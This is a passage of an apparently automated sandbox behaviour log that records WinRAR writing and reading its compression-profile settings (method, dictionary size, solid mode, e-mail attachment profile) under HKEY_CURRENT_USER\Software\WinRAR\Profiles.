Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Fresh, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SyncFiles, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Overwrite, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Move, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcRecBin, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcWipe, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = WipeIfPassword, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Solid, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Test, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecEnabled, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecSize, data = 4294967293, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EraseDest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = AddArcOnly, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ClearArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Lock, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Method, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSizeLZ, data = 4194304, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSize, data = 33554432, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Background, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = WaitForOther, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Shutdown, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PasswordData, size = 1, type = REG_BINARY True 1
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EncryptHeaders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ZipLegacyEncrypt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OpenShared, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ProcessOwners, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveStreams, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveSymLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveHardLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = GenerateArcName, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VersionControl, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = BLAKE2, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileCopies, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = QuickOpen, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = GenerateMask, data = yyyymmddhhmmss, size = 30, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileTimeMode, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileDays, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileHours, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileMinutes, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileTimeLimit, data = 0, size = 8, type = REG_QWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcTimeOriginal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcTimeLatest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = mtime, data = 4, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ctime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = atime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsAbs, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsNone, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsAbsDrive, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArcDoubleExt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArcSubfolders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EmailArcTo, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PackDetails, size = 192, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = SMP, data = 1, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Name, data = Create e-mail attachment, size = 50, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Default, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ArcName False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = FileNames False 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ImmExec, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ExclNames, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = StoreNames, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = UseRAR, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = RAR5, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SFXModule, size = 2, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SFX False 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SFXIcon, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SFXLogo, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SFXElevate, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = CmtFile, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = CmtDataWide, size = 2, type = REG_BINARY True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = VolumeSize, data = 0, size = 4, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = VolSizeMod, data = 2, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = VolPause, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = OldVolNames, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = RecVolNumber, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Update, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Fresh, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SyncFiles, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Overwrite, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Move, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ArcRecBin, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ArcWipe, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = WipeIfPassword, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Solid, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Test, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = RecEnabled, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = RecSize, data = 4294967293, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = EraseDest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = AddArcOnly, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ClearArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Lock, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Method, data = 5, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = DictSizeLZ, data = 33554432, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = DictSize, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Background, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = WaitForOther, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Shutdown, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = PasswordData, size = 1, type = REG_BINARY True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = EncryptHeaders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ZipLegacyEncrypt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = OpenShared, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = ProcessOwners, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SaveStreams, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SaveSymLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = SaveHardLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = GenerateArcName, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = VersionControl, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = BLAKE2, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = FileCopies, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
